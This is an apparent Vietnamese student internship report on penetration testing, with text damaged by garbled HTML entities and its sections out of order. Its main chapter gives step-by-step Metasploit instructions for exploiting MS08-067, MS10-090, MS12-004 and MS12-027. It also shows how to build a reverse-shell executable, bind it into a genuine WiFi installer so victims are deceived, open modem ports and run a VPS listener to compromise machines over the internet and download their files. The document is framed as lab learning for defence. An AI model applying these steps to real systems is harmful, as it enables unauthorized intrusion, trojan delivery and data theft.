Thiết lập những Policie cần thiết để phục vụ quaacute trigravenh Scan lỗi tương ứng sau khi
đatilde thiết lập xong ta bắt đầu Scan lỗi hệ điều hagravenh
Tại ocirc Name ta điền tecircn hệ điều hagravenh Policy ta chọn Policies đatilde thiết lập trước đoacute
Target chiacutenh lagrave mục tiecircu magrave ta muốn Scan Vagrave chon Lauch để bắt đầu Scan Kết quả sau
khi Scan Windows XP Service Pack 2
Những lỗi magraveu đỏ thể hiện đoacute chiacutenh lagrave những lỗi nghiecircm trọng Magraveu Vagraveng chỉ ở mức
trung bigravenh vagrave magraveu xanh lagrave những thocircng ti về hệ điều hagravenh
20
Cuối cugraveng sau khi đatilde xaacutec định được những lỗi của hệ điều hagravenh ta bắt đầu tigravem hiểu
khai thaacutec những lỗ hỏng đoacute
225 QUAacute TRIgraveNH XAcircM NHẬP HỆ THỐNG QUA CAacuteC LỖ HỔNG
Cần chuẩn bị 1 maacutey cagravei Backtrack vagrave 1 maacutey đoacuteng vai trograve lagrave maacutey nạn nhacircn để ta xacircm nhập
( sử dụng hệ điều hagravenh XP) Kết nối 2 maacutey như mocirc higravenh becircn dưới
2251 LỖI MS08_067
21
Đặt IP cho maacutey BackTrack vagrave maacutey XP Chắc chắn rằng 2 maacutey đatilde kết nối thocircng với nhau
Tại maacutey Backtrackkhởi động Metasploit bằng lệnh ldquomsfconsolerdquo
Sau đoacute gotilde lệnh ldquosearch ms08_067rdquo để tigravem module lỗi trong metasploit
22
Sau khi tigravem kiếm sẽ hiện ra đường dẫn của module Ta gotilde lệnh ldquouse đường dẫnrdquo để
vagraveo cấu higravenh module
23
Gotilde lệnh ldquoshow optionsrdquo để xem caacutec thocircng tin cần thiết lập
Lần lượt cấu higravenh
- Set RHOST [ip maacutey xp]
- Set payload winsowsmeterpreterreverse_tcp
- Set Lhost [ip maacutey BackTrack]
24
Sau đoacute gotilde lệnh ldquoExploitrdquo để bắt đầu quaacute trigravenh khai thaacutec
Sau khi maacutey BackTrack thocircng baacuteo đatilde thiết lập được 1 sessions thigrave ta đatilde coacute thể lagravem chủ
maacutey nạn nhacircn
- Gotilde lệnh ldquogetuidrdquo để lấy thocircng tin Username
- Gotilde lệnh ldquosysinfordquo để xem thocircng tin maacutey nạn nhacircn
- Gotilde lệnh ldquo shellrdquo để bắt đầu xacircm nhập vagraveo maacutey nạn nhacircn Luacutec nagravey ta đatilde coacute
quyền tương đương user đang đăng nhập trecircn maacutey nạn nhacircn
25
Dấu nhắc lệnh tại cửa sổ console đứng tại ldquo CWINDOWSSYSTEM32rdquo Sử dụng lệnh
ldquomd trungrdquo để tạo 1 thư mục coacute tecircn ldquotrungrdquo trong thư mục ldquosystem32rdquo trecircn maacutey XP
26
Vagrave kết quả trong thư mục ldquosystem32rdquo trong ổ đĩa ldquoCrdquo của maacutey xp đatilde coacute thư mục ldquotrungrdquo
vừa tạo
Tới đacircy ta đatilde hoagraven tất quaacute trigravenh khai thaacutec matilde lỗi ms08_067
2252 LỖI MS10_090
Dugraveng lệnh ldquoifconfigrdquo để kiểm tra ip maacutey BackTrack
Tại maacutey XP dugraveng lệnh ldquoipconfigrdquo để kiểm tra ip
27
Trecircn maacutey BackTrack dugraveng lệnh ldquoping [ip maacutey XP]rdquo để đảm bảo 2 maacutey đatilde kết nối thocircng
với nhau
Gotilde lệnh ldquomsfconsolerdquo để khởi động metasploit
28
Gotilde lệnh ldquosearch ms10_090rdquo để tigravem kiếm module lỗi ms10_090
29
Sau khi coacute đường dẫn dugraveng lệnh ldquouse [đường dẫn của module]rdquo để bắt đầu thiết lập
thocircng số
Dugraveng lệnh ldquoshow optionsrdquo để biết caacutec thocircng tin cần thiết lập
30
Lần lượt thiết lập caacutec thocircng số bằng caacutec lệnh
- Set srvhost [ip maacutey backtrack]
- Set lhost [ip maacutey backtrack]
- Set payload windowsmeterpreterreverse_tcp
Cuối cugraveng dugraveng lệnh ldquoExploitrdquo để khởi động module
31
Luacutec nagravey tại maacutey Backtrack sẽ tạo ra 1 đường link Nếu maacutey XP nhấp vagraveo đường link nagravey
thigrave sẽ bị xacircm nhập
Mở trigravenh duyệt IE tại maacutey XP vagrave truy cập vagraveo đường link được tạo từ maacutey BackTrack
32
Luacutec nagravey maacutey BackTrack sẽ gửi matilde độc tới maacutey XP Vagrave sau đoacute thực hiện 1 phiecircn kết nối
để xacircm nhập
Dugraveng lệnh ldquosessionsrdquo để xem thocircng tin phiecircn kết nối
Tiếp theo dugraveng lệnh ldquosessions ndashI [ID của session]rdquo để bắt đầu xacircm nhập
33
Tới đacircy ta đatilde hoagraven tất quaacute trigravenh xacircm nhập Bacircy giờ ta dugraveng caacutec lệnh
- Sysinfo để lấy thocircng tin maacutey nạn nhacircn ( ở đacircy lagrave maacutey XP)
- Getuid để lấy thocircng tin Username
- Shell xacircm nhập vagraveo maacutey nạn nhacircn
Thử kết quả bằng caacutech dugraveng lệnh ldquo md trungrdquo để tạo 1 thư mục tecircn ldquotrungrdquo trecircn maacutey nạn
nhacircn
34
Vagrave kiểm tra trecircn magraven higravenh maacutey XP đatilde coacute thư mục vừa tạo
2253 LỖI MS12_004
Matilde lỗi nagravey khai thaacutec lỗi của file MIDI trong IE
Trước tiecircn trecircn maacutey BackTrack dugraveng lệnh ldquo ifconfigrdquo để kiểm tra địa chỉ IP Sau đoacute dugraveng
lệnh ldquo ping [IP maacutey XP]rdquo để kiểm tra kết nối giữa maacutey BackTrack vagrave maacutey XP đatilde thocircng
với nhau
35
Sau đoacute dugraveng lệnh ldquomsfconsolerdquo để khởi động Metasploit
Dugraveng lệnh ldquo search ms12_004rdquo để tigravem module của matilde lỗi
36
Sau khi hệ thống tigravem ra đường dẫn của module matilde lỗi ms12_004 Ta ghi nhớ đường dẫn
sau đoacute dugraveng lệnh ldquouse [đường dẫn]rdquo để bắt đầu sử dụng
37
Dugraveng lệnh ldquoShow optionsrdquo để xem caacutec thocircng tin cần thiết lập
Tiếp theo thiết lập caacutec thocircng số cần thiết bằng caacutec lệnh
- Set SRVHOST [ip maacutey Backtrack]
- Set LHOST [ip maacutey BackTrack]
- Set payload windowsmeterpreterreverse_tcp
38
Cuốt cugraveng gotilde lệnh ldquo Exploitrdquo để bắt đầu khai thaacutec lỗi
Luacutec nagravey maacutey BackTrack sẽ tạo ra 1 đương link Khi maacutey XP truy cập vagraveo đường link nagravey
thigrave sẽ bị xacircm nhập
39
Trecircn maacutey XP mở trigravenh duyệt IE vagrave truy cập vagraveo đường link đoacute
Ngay lập tức maacutey BackTrac sẽ gửi caacutec đoạn matilde độc để xacircm nhập dựa vagraveo lỗ hổng
40
Khi maacutey Backtrack thocircng baacuteo đatilde coacute 1 phiecircn kết nối thigrave luacutec đoacute ta đatilde coacute thể xacircm nhập vagraveo
maacutey nạn nhacircn
Dugraveng lệnh ldquosessionsrdquo để kiểm tra thocircng tin phiecircn kết nối
41
Tiếp theo dugraveng lệnh ldquosession ndashI [ID của phiecircn kết nối]rdquo để xacircm nhập vagraveo maacutey nạn
nhacircn
Tới đacircy ta đatilde coacute thể lagravem chủ hệ thống của maacutey nạn nhacircn
- Dugraveng lệnh ldquogetuidrdquo để lấy thocircng tin Username
- Dugraveng lện ldquosysinfordquo để xem thocircng tin maacutey nạn nhacircn
- Dugraveng lecircnh ldquoshellrdquo để xacircm nhacircp hệ thống
42
Thử tạo 1 thư mục coacute tecircn ldquotrungrdquo bằng lệnh ldquomd trungrdquo
Ngay lập tức trecircn magraven higravenh maacutey XP sẽ coacute thư mục ldquotrungrdquo
43
Như vậy ta đatilde hoagraven thagravenh khai thaacutec matilde lỗi ms12_004
2254 LỖI MS12_027
Lỗi MS12_027 lagrave lỗi magrave thocircng qua bộ cocircng cụ Office hacker sẽ tấn cocircng vagraveo hệ thống vagrave
chiếm quyền điều khiển Trong caacutec phiecircn bản Office phổ biến (từ 2003 2007 2010) đều diacutenh
lỗ hổng nagravey
Bắt đầu quaacute trigravenh tấn cocircng Ta khởi động Metasploit bằng cacircu lệnh ldquomsfconsolerdquo trecircn
Backtrack
44
Dugraveng lệnh ldquosearch ms12_027rdquo để tigravem module của matilde lỗi trong Metasploit
Sau khi coacute đường dẫn của module Dugraveng lệnh ldquo use [đường dẫn module]rdquo để sử dụng
45
Gotilde lệnh ldquo Show optionsrdquo để xem những thuộc tiacutenh cần thiết lập
Cần tạo 1 file giả coacute định dạng doc để lagravem cocircng cụ xacircm nhập maacutey nạn nhacircn
Dugraveng lệnh ldquo Set filename [ten file]docrdquo
46
Tiếp đoacute lần lượt gotilde lệnh
- ldquoSet payload windowsmeterpreterreverse_tcprdquo thiết lập payload của
module
- ldquoSet LHOST [ip maacutey Backtrack]rdquo Thiết lập ip maacutey lắng nghe
Sau đoacute gotilde lệnh ldquoExploitrdquo để hoagraven thagravenh việc thiết lập thocircng tin vagrave tạo file giả
47
Maacutey Backtrack luacutec nagravey sẽ tạo ra file doc vagrave thocircng baacuteo đường dẫn file được tạo ra
Kế tiếp ta cần thiết lập 1 trigravenh lắng nghe vagrave điều khiển maacutey nạn nhacircn ( sau khi maacutey nạn
nhacircn bị nhiễm matilde độc trong file doc)
Dugraveng lệnh ldquouse exploitmultihandlerrdquo
48
Sau đoacute thiết lập caacutec thocircng số
- ldquoSet payload windowsmeterpreterreverse_tcprdquo
- ldquoSet LHOST [ip maacutey Backtrack]rdquo
Sau đoacute dugraveng lệnh ldquoExploitrdquo để bắt đầu lắng nghe vagrave thiết lập phiecircn kết nối với maacutey nạn
nhacircn để xacircm nhập ngay khi maacutey nạn nhacircn bị nhiễm matilde độc khi mở file doc
Tới đacircy đatilde hoagraven tất việc thiết lập vagrave triển khai xacircm nhập Giờ ta sẽ chờ maacutey nạn nhacircn bị
49
nhiễm matilde độc Caacutech dễ nhất lagrave đưa file doc lecircn trigravenh duyệt web để nạn nhacircn tải về
Copy file doc được tạo vagraveo thư mục varwww Mở console khaacutec lecircnh gotilde lệnh
ldquocp [đường dẫn tới file doc] varwwwrdquo
Sau đoacute triển khai web server bằng lệnh
ldquoetcinitdapache 2 startrdquo
Từ maacutey XP truy cập vagraveo địa chỉ ldquo http[ip maacutey backtrack][file doc]rdquo 1 cửa sổ ldquo file
downloadrdquo hiện ra
50
Khi file doc được mở tại maacutey nạn nhacircn Ngay luacutec nagravey maacutey Backtrack sẽ kết nối tới maacutey
nạn nhacircn vagrave bắt đầu xacircm nhập Khi coacute thocircng baacuteo 1 session đatilde được thiết lập thigrave ta đatilde coacute
thể chiểm quyền user đang đăng nhập trecircn maacutey nạn nhacircn
51
- Dugraveng lệnh ldquogetuidrdquo để lấy thocircng tin Username
- Dugraveng lện ldquosysinfordquo để xem thocircng tin maacutey nạn nhacircn
- Dugraveng lecircnh ldquoshellrdquo để xacircm nhacircp hệ thống
52
Tạo 1 thư mục tecircn ldquotrungrdquo bằng lệnh ldquomd trungrdquo
Kiểm tra trecircn magraven higravenh maacutey XP ta thấy thư mục vừa đươc tạo từ maacutey Backtrack
Tới đacircy ta đatilde kết thuacutec quaacute trigravenh xacircm nhập qua matilde lỗi ms12_027
2255 MỞ PORT TREN MODEMTẤN CONG NGOAI MẠNG
INTERNET
53
Đầu tiecircn dugraveng lệnh ldquopingrdquo để kiểm tra kết nối internet
Sau đoacute dugraveng lệnh ldquomsfpayload windowsshell_reverse_tcp LHOST=[ip mặt ngoagravei maacutey
Backtrack] LPORT=[port sẽ mở trong modem] X gt tmp[tecircn file]exerdquo để tạo 1 file shell
(file thực thi) Sau nagravey ta sẽ gửi file nagravey cho nạn nhacircn để kết nối với maacutey nạn nhacircn Trong
higravenh dưới
Lhost=15428158 lagrave ip mặt ngoagravei của maacutey Backtrack( Vagraveo trang whatismyipcom để xem
ip nagravey)
Lport=4455 lagrave port được chỉ định để lắng nghe phiecircn kết nối Port nagravey sẽ được mở trong
modem internet vagrave được trả về địa chỉ ip local của maacutey Backtrack
tmpMypublickWifiexe lagrave file shell ta tạo ra từ cacircu lệnh nagravey coacute tecircn lagrave ldquoMypublicWifirdquo vagrave
được lưu ở đường dẫn tmp
Dugraveng lệnh ldquoifconfigrdquo để xem ip của maacutey BackTrack trong mạng Lan Sau nagravey khi mở
port ta sẽ trỏ port đoacute về ip nagravey
54
Đăng nhập vagraveo modem từ trigravenh duyệt web vagraveo mục Nat vagrave mở port khi natildey ra đatilde chọn
55
Tiếp theo mở cửa sổ console khaacutec vagrave khởi động Metasploit bằng cacircu lệnh ldquomsfconsolerdquo
Sử dụng module multihander trong Metasploit để giữ kết nối
Gotilde lệnh ldquouse exploitmultihanderrdquo
Lần lượt gotilde caacutec lệnh
- ldquoSet payload windowsshellreverse_tcprdquo để chọn payload cho module
- ldquoSet lhost [ip mặt ngoagravei maacutey BackTrack]rdquo Cấu higravenh ip lắng nghe nhận kết nối
trecircn mạng
- ldquoSet lport [port được mở]rdquo Cấu higravenh port lắng nghe
Dugraveng lệnh ldquoShow optionsrdquo để kiểm tra lại thocircng tin đatilde cấu higravenh
56
Tới đacircy ta dugraveng lệnh ldquoexploitrdquo để bắt đầu lắng nghe
Việc cograven lại lagrave chờ nạn nhacircn bị nhiễm matilde độc khi chạy file shell ta đatilde tạo ra Vấn đề lagrave
lagravem sao để nạn nhacircn thực thi file đoacute File shell nằm trong đường dẫn ldquotmpmypublicwifirdquo
magrave khi natildey ta đatilde tạo
57
Ở đacircy ta gheacutep file ldquomypublicwifiexerdquo do Backtrack tạo ra với 1 file setup của phần mềm
phaacutet wifi coacute tecircn ldquomypublicwifiexerdquo thật sự khaacutec Việc nagravey sẽ dễ đaacutenh lừa được nạn nhacircn
hơn Khi gheacutep xong ta sẽ coacute 1 file setup của phần mềm mypublicwifi thật sự tuy nhiecircn
khi nạn nhacircn chạy file setup nagravey cũng sẽ đồng thời chạy file do Backtrack tạo ra Để gheacutep
được ta coacute thể tham khảo trecircn mạng với từ khoacutea ldquobind two exerdquo
58
Khi nạn nhacircn chạy file setup nagravey thigrave maacutey Backtrack lập tức sẽ tạo kết nối với maacutey nạn
nhacircn Khi coacute thocircng baacuteo 1 sessions được thiết lập thigrave ta đatilde xacircm nhập được vagraveo maacutey nạn
nhacircn
Thử tạo 1 thư mục trecircn ổ đĩa ldquoCrdquo của maacutey nạn nhacircn bằng lệnh
ldquoCd C rdquo Lệnh nagravey đưa vị triacute lagravem việc về ổ C
ldquomkdir Trungrdquo Lệnh nagravey tạo thư mục tecircn Trung
Vagrave kiểm tra trecircn maacutey nạn nhacircn
59
Tới đacircy ta kết thuacutec việc tấn cocircng maacutey nạn nhacircn ngoagravei mạng internet bằng Metasploit qua
việc tạo file shell chứa matilde độc
2256 CAgraveI ĐẶT METASPLOIT TREN VPS SỬ DỤNG GIAO DIỆN
WEB CỦA METASPLOIT KHAI THAacuteC MAtilde LỖI MS10_090 TỪ
VPS
Từ VPS tải phần mềm chương trigravenh Metasploit từ web site httpmetasploitcom Cagravei
đặt như caacutec phần mềm khaacutec Chuacute yacute tắt tường lửa vagrave chương trigravenh anti virut nếu coacute
Đăng nhập vagraveo VPS mở giao diện web của Metasploit Community
Chọn Start-gtprogram-gtmetasploit-gtAccess metasploit UI
60
Chọn project ở đacircy migravenh để project default
Click Module -gtsearch
Gotilde vagraveo ocirc tigravem kiếm matilde lỗi ms10_090 Sau đoacute click vagraveo module hiện ra
61
Khai baacuteo thocircng số srvhost lagrave địa chỉ ip của VPS Sau đoacute chọn Run module
Sau khi Module được chạy Metasploit sẽ tạo ra 1 đường link Khi victim truy cập đường
link nagravey thigrave sẽ bị xacircm nhập
62
Kiểm tra tiacutenh thagravenh cocircng bằng caacutech từ 1 maacutey XP được kết nối internet ta truy cập vagraveo
đường link trecircn
Ngay lập tức Metasloit sẽ gửi caacutec kết nối tới Victim
63
Khi coacute thocircng baacuteo 1 session đatilde được thiết lập lagrave ta đatilde thagravenh cocircng
Ta đatilde coacute thể xacircm nhập hoagraven toagraven vagraveo maacutey victim Xemtải filetạo filehelliplagravem gigrave tugravey yacute
64
Sau đacircy lagrave 1 số higravenh ảnh xacircm nhập vagraveo maacutey victim
Truy cập ổ đĩa trecircn maacutey Victim
Tải dữ liệu trecircn maacutey Victim
65
Kết thuacutec module xacircm nhập qua internet bằng matilde lỗi ms10_090 với phần mềm Metasploit
được cagravei đặt trecircn VPS
2257 XAcircM NHẬP WINDOWS 8 TỪ VPS
Cần chuẩn bị
- 1 maacutey Backtrack
- 1 VPS được cagravei sẵn Metasploit
Trecircn maacutey Backtrack Tạo 1 file thực thi để gửi cho victim Khi Victim chạy file nagravey thigrave sẽ
bị xacircm nhập
Để tạo file shel gotilde lệnh
Msfpayload windowsshell_reverse_tcp lhost=[IP VPS] lport=4455 X gt tmp[ten
file]exe
File shell nagravey sẽ đc lưu tại đường dẫn tmp
66
Sau đoacute đăng nhập vagraveo VPS khởi động metasploit vagrave cấu higravenh metasploit về chế độ lắng
nghe vagrave giữ caacutec kết nối
Gotilde caacutec lệnh
- Use exploitmultihander Chuyển về chế độ lắng nghe
- Set payload windowsshellreverse_tcp Chọn payload
- Set lhost[ip VPS] Cấu higravenh IP lắng nghe
- Set lport 4455 cấu higravenh port lắng nghe
Sau đoacute gotilde lệnh Exploit để bắt đầu
67
Việc cần lagravem bacircy giờ lagrave gửi file shell ban đầu tạo ở maacutey Backtrack cho Victim Mỗi 1
victim chạy file shell thigrave VPS sẽ bắt được 1 kết nối để xacircm nhập
Giờ ta sẽ cho maacutey windows 8 chạy file shell
Vagrave ngay lập tức VPS sẽ bắt được kết nối vagrave xacircm nhập
Dugraveng lệnh mkdir Trung để tạo 1 thư mục coacute tecircn Trung trecircn magraven higravenh maacutey windows 8
68
Kiểm tra trecircn magraven higravenh maacutey windows 8 ta đatilde thấy thư mục Trung
Kết thuacutec module xacircm nhập maacutey tiacutenh windwos 8 từ VPS
69
CHƯƠNG 3 NHẬN XEacuteT- ĐAacuteNH GIAacute
31 ƯU ĐIỂM
Đề tagravei an ninh mạng giuacutep cho em hiểu quaacute trigravenh tấn cocircng chuacuteng ta cần phải lagravem những gigrave
phải chuẩn bị thu thập những thocircng tin như thế nagraveo vagrave từ đacircu Sau đoacute lagrave quaacute trigravenh tấn cocircng
vagraveo hệ thống maacutey tiacutenh nạn nhacircn Từ đoacute biết được caacutech thức cũng như quaacute trigravenh hacker sẽ
lagravem gigrave qua đoacute chuacuteng ta sẽ biết được caacutech phograveng thủ vagrave triển khai hệ thống an ninh mạng
giuacutep cho hệ thống của ta an toagraven trước những cuộc tấn cocircng
32 KHUYẾT ĐIỂM
Đề tagravei nagravey em mới được lagravem quen vagrave tigravem hiểu necircn đối tượng để xacircm nhập em vẫn dugraveng
những hệ điều hagravenh cũ như windows XP Windows 7 Đến hiện nay Microsoft đatilde khai tử
hệ điều hagravenh XP necircn những matilde lỗi em thực hiện ở trecircn đatilde mất đi 1 phần nagraveo yacute nghĩa Qua
đoacute em thấy được sự rộng lớn của an ninh mạng Phải thay đổi vagrave cập nhật từng luacutec
33 KẾT LUẬN
Trong quaacute trigravenh nghiecircn cứu đề tagravei an ninh mạng em nhận thấy rằng đacircy lagrave một trong
những lĩnh vực rất đa dạng vagrave phong phuacute vagrave thật sự quan trọng đặc biệt lagrave vấn đề lagravem
sao cho hệ thống maacutey tiacutenh hoạt động trơn tru traacutenh được đe dọa những cuộc tấn cocircng
của hacker Noacute khocircng những gacircy nguy hại đến người dugraveng magrave đặc biệt lagrave những doanh
nghiệp những tập đoagraven ngacircn hagraveng tagravei chiacutenh Quaacute trigravenh tigravem hiểu vagrave nghiecircn cứu tại
Trung Tacircm Đagraveo Tạo Quản Trị Mạng amp An Ninh Mạng Quốc tế ATHENA chỉ vỏn vẹn
hai thaacuteng vagrave cograven rất nhiều kiến thức khaacutec liecircn quan em nhận thấy migravenh cần phải tiếp tục
nỗ lực hơn nữa nhưng đề tagravei an ninh mạng thật sự rất locirci cuốn vagrave hấp dẫn đối với em
Kiến thức thực tiễn rất đa dạng vagrave phong phuacute so với những gigrave em học được vagrave nghiecircn
cứu em sẽ nỗ lực cố gắng hơn nữa bởi mong ước của em lagrave trở thagravenh chuyecircn gia an
ninh mạng cao cấp
iii
CỘNG HOgraveA XAtilde HỘI CHỦ NGHĨA VIỆT NAM
Độc lập ndash Tự do ndash Hạnh phuacutec
NHẬN XEacuteT THỰC TẬP
Họ vagrave tecircn sinh viecircn ĐAgraveO COcircNG TRUNG
Matilde sinh viecircn 12203214
Khoaacute học 2012-2014
1 Thời gian thực tập
helliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphellip
helliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphellip
helliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphellip
2 Bộ phận thực tập
helliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphellip
helliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphellip
3 Tinh thần traacutech nhiệm với cocircng việc vagrave yacute thức chấp hagravenh kỷ luật
helliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphellip
helliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphellip
helliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphellip
helliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphellip
4 Kết quả thực tập theo đề tagravei
helliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphellip
helliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphellip
helliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphellip
5 Nhận xeacutet chung
helliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphellip
helliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphellip
helliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphelliphellip
Caacuten bộ hướng dẫn của cơ quan đến thực tập (Kyacute vagrave ghi rotilde họ tecircn)
Ngagravey thaacuteng năm
Thủ trưởng cơ quan (Kyacute tecircn vagrave đoacuteng dấu)
iv
NHẬN XEacuteT CỦA GIAacuteO VIEcircN HƯỚNG DẪN
Ngagravey thaacuteng năm
GIAacuteO VIEcircN HƯỚNG DẪN (Kyacute vagrave ghi rotilde họ tecircn)
v
MỤC LỤC
LỜI CAacuteM ƠN ii
NHẬN XEacuteT THỰC TẬP iii
NHẬN XEacuteT CỦA GIAacuteO VIEcircN HƯỚNG DẪN iv
LỜI MỞ ĐẦU vii
CHƯƠNG 1 GIỚI THIỆU CHUNG ĐƠN VỊ THỰC TẬP VAgrave DỰ AacuteN MẠNG 1
11 GIỚI THIỆU VỀ COcircNG TY 1
12 LỊCH SỬ HIgraveNH THAgraveNH 1
13 QUAacute TRIgraveNH PHAacuteT TRIỂN 2
14 CHỨC NĂNG VAgrave NHIỆM VỤ 3
15 CƠ CẤU TỔ CHỨC 3
16 LĨNH VỰC HOẠT ĐỘNG KINH DOANH 3
17 THOcircNG TIN VỀ DỰ AacuteN SINH VIEcircN THAM GIA THỰC TẬP 4
CHƯƠNG 2 THỰC TRẠNG QUAacute TRIgraveNH THỰC HIỆN DỰ AacuteN MẠNG 5
21 TIẾN ĐỘ THỰC HIỆN DỰ AacuteN 5
22 QUAacute TRIgraveNH THI COcircNG CAacuteC HẠNG MỤC CỦA DỰ AacuteN 5
221 TỔNG QUAN VỀ BACKTRACK 5
2211 GIỚI THIỆU BACKTRACK 5
2212 LỊCH SỬ PHAacuteT TRIỂN 6
2213 MỤC ĐIacuteCH 6
222 FOOTPRINTING 7
223 CAacuteC KIỂU FOOTPRINTING 8
2231 PASSIVE FOOTPRINTING 8
2232 ACTIVE FOOTPRING 13
224 SCANING 13
2241 CAacuteC COcircNG CỤ TIỆN IacuteCH 14
2242 QUAacute TRIgraveNH THỰC HIỆN SCANING 14
225 QUAacute TRIgraveNH XAcircM NHẬP HỆ THỐNG QUA CAacuteC LỖ HỔNG 20
2251 LỖI MS08_067 20
2252 LỖI MS10_090 26
2253 LỖI MS12_004 34
2254 LỖI MS12_027 43
vi
2255 MỞ PORT TREN MODEMTẤN CONG NGOAI MẠNG
INTERNET 52
2256 CAgraveI ĐẶT METASPLOIT TREN VPS SỬ DỤNG GIAO DIỆN
WEB CỦA METASPLOIT KHAI THAacuteC MAtilde LỖI MS10_090 TỪ VPS 59
2257 XAcircM NHẬP WINDOWS 8 TỪ VPS 65
CHƯƠNG 3 NHẬN XEacuteT- ĐAacuteNH GIAacute 69
31 ƯU ĐIỂM 69
32 KHUYẾT ĐIỂM 69
33 KẾT LUẬN 69
vii
LỜI MỞ ĐẦU
Trong thời đại ngagravey nay vai trograve của Cocircng nghệ Thocircng tin (CNTT) vagrave Internet ngagravey
cagraveng vocirc cugraveng quan trọng Điều nagravey keacuteo theo phần lớn caacutec ngagravenh kinh tế phụ thuộc vagraveo
maacutey vi tiacutenh Chiacutenh vigrave vậy nhiều yacute đồ phaacute hoại đatilde nhắm vagraveo hệ thống nagravey vagrave cũng
khocircng loại trừ khả năng đối thủ cạnh tranh nhau do đoacute để bảo đảm maacutey tiacutenh hoạt động
trơn tru liecircn tục đogravei hỏi hệ thống phải trang bị những cocircng cụ những biện phaacutep phograveng
thủ những hệ thống cảnh baacuteo bảo mật cao nhằm chống lại những tin tặc (hacker)
Chuacuteng ta biết rằng hacker coacute 2 loại hacker mũ đen vagrave hacker mũ trắng Hacker mũ đen
lagrave những tay tinh quaacutei vagrave thocircng minh vocirc cugraveng họ khocircng chỉ giỏi về khả năng lập trigravenh
magrave cograven giỏi về cả mạng giao thức mạng họ coacute thể lợi dụng những lỗi nhỏ nhất từ đoacute
khai thaacutec vagrave tấn cocircng hệ thống maacutey chủ gacircy thiệt hại lớn nếu đoacute lagrave 1 doanh nghiệp lớn
1 tập đoagraven lớn hay ngacircn hagravenghellip Thật nguy hiểm nếu như toagraven bộ thocircng tin tagravei khoản
ngacircn hagraveng của khaacutech hagraveng loạt vagraveo tay hacker cũng như những dự aacuten kế hoạch của
tập đoagraven hay của doanh nghiệp Quả thật thiệt hại do hacker gacircy ra quaacute lớn ảnh hưởng
nghiecircm trọng đến người dugraveng maacutey tiacutenh Vigrave vậy nhằm chống lại những hacker mũ đen
những hacker mũ trắng khocircng ngừng nacircng cao kiến thức cũng như sự nhạy beacuten cẩn
thận tư duy saacuteng tạo khocircng ngừng nhằm ngăn chặn bảo vệ người dugraveng maacutey tiacutenh tạo
nơi người dugraveng sự tin cậy cũng như những thocircng tin tagravei khoản kế hoạch dự aacuten của họ
sẽ hoagraven toagraven được bảo mật an toagraven tuyệt đối Do đoacute vai trograve an ninh mạng thật sự thiết
thực cũng giống như 1 đất nước nếu khocircng coacute lực lượng cocircng an cảnh saacutet quacircn đội thigrave
hậu quả magrave người dacircn phải gaacutenh chịu thật nghiecircm trọng vagrave chắc chắn đất nước đoacute sẽ
khocircng bao giờ phaacutet triển kịp theo thời đại kỹ thuật số hiện nay
Nội dung baacuteo caacuteo gồm 3 chương chiacutenh
Chương 1 Giới thiệu chung đơn vị thực tập vagrave dự aacuten mạng
Chương 2 Thực trạng quaacute trigravenh thực hiện dự aacuten mạng
Chương 3 Nhận xeacutet đaacutenh giaacute thực trạng
1
CHƯƠNG 1 GIỚI THIỆU CHUNG ĐƠN VỊ THỰC TẬP VAgrave DỰ AacuteN
MẠNG
11 GIỚI THIỆU VỀ COcircNG TY
Trung Tacircm Đagraveo Tạo Mạng vagrave Quản Trị Mạng Quốc Tế ATHENA tiền thacircn lagrave Cocircng ty
TNHH Tư vấn vagrave Đagraveo tạo quản trị mạng Việt Năng (tecircn thương hiệu viết tắt lagrave TRUNG
TAcircM ĐAgraveO TẠO ATHENA) được chiacutenh thức thagravenh lập theo giấy pheacutep kinh doanh số
4104006757 của Sở Kế Hoạch Vagrave Đầu Tư Tp Hồ Chiacute Minh cấp ngagravey 04 thaacuteng 11 năm
2008
Tecircn cocircng ty viết bằng tiếng nước ngoagravei ATHENA ADVICE TRAINING NETWORK
SECURITY COMPANY LIMITED
12 LỊCH SỬ HIgraveNH THAgraveNH
